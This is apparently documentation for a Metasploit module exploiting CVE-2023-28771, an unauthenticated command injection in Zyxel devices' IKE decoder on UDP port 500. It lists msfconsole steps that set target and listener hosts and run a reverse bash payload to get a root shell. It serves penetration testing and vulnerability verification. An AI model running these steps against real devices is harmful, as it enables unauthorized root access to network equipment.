rapid7/metasploit-framework
# CVE-2023-28771 - Zyxel Command Injection

This module exploits CVE-2023-28771, a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. For a full technical analysis of the vulnerability read the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis).

## Testing
A physical device is required for testing. The device must be running a vulnerable firmware version prior to the
vendor patch. A Zyxel USG FLEX 100 device was used during development and testing of this Metasploit module.

The attacker must be able to send UDP data to port 500 on the WAN interface of the affected network device.

## Verification Steps
1. Start msfconsole
2. `use exploit/linux/misc/zyxel_ike_decoder_rce_cve_2023_28771`
3. `set RHOST <TARGET_WAN_IP>`
4. `set LHOST eth0`
5. `check`
6. `exploit`
7. The default target `0` is a `cmd/unix/reverse_bash` payload. A root command shell session should be created.
